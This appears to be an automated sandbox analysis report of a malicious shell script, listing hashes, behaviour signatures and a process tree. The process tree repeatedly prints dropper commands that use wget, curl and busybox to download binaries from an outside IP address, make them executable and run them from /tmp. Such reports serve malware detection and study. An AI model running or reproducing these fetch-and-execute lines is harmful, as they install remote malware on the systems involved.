Analysis
-
max time kernel
150s -
max time network
156s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/11/2024, 08:14
Static task
static1
Behavioral task
behavioral1
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
-
Size
10KB
-
MD5
77bee17b866cc1fd41dd0e6795516a37
-
SHA1
fbe900100ffafc804c69a94b5ee81405100c02e5
-
SHA256
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f
-
SHA512
6284423f5b87140261dee3ec564d00d38f4dd59dd41f86a9d342027230a4012db3224b4cb8e9341a4a30ffcb73b822319b88a65d51c55678886b6a708fa62d4d
-
SSDEEP
192:YnrtGG7NhRmOJQM4+2IJ7Rk8UD+u0KCaHHRYbAQrHB+GvrHB+GRnrtGGJNhRmOuX:8NhRmOJQM4+xJ7dfKOAQrHB+GvrHB+Gy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 924 chmod 737 chmod 767 chmod 799 chmod 827 chmod 893 chmod 809 chmod 875 chmod 905 chmod 933 chmod 746 chmod 850 chmod 869 chmod 887 chmod 899 chmod 918 chmod 729 chmod 815 chmod 863 chmod 881 chmod 911 chmod -
Executes dropped EXE 21 IoCs
ioc pid Process /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n 731 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr 738 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij 747 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR 769 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK 800 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll 810 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD 816 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd 828 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv 852 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI 864 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 870 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH 876 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb 882 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN 888 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb 894 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN 900 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n 906 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr 912 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij 919 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR 925 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK 934 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK curl File opened for modification /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH curl File opened for modification /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN curl File opened for modification /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n curl File opened for modification /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij curl File opened for modification /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR curl File opened for modification /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI curl File opened for modification /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb curl File opened for modification /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR curl File opened for modification /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij curl File opened for modification /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n curl File opened for modification /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr curl File opened for modification /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll curl File opened for modification /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd curl File opened for modification /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb curl File opened for modification /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN curl File opened for modification /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr curl File opened for modification /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD curl File opened for modification /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv curl File opened for modification /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 curl File opened for modification /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK curl
Processes
-
/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:702
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:709
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:726
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:732
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:733
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:736
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:739
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:740
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:745
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:748
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:749
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:764
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:772
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:773
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:795
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:803
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:804
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:808
-
-
/bin/chmodchmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:811
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:812
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:814
-
-
/bin/chmodchmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:817
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:818
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:823
-
-
/bin/chmodchmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:831
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:832
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:846
-
-
/bin/chmodchmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:855
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:856
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:862
-
-
/bin/chmodchmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:865
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:866
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:868
-
-
/bin/chmodchmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:871
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:872
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:874
-
-
/bin/chmodchmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:877
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:878
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:880
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:883
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:884
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:886
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:890
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:892
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:898
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:904
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:910
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:917
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:920
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:921
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:923
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:929
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:932
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:936
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Reads runtime system information
PID:937
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97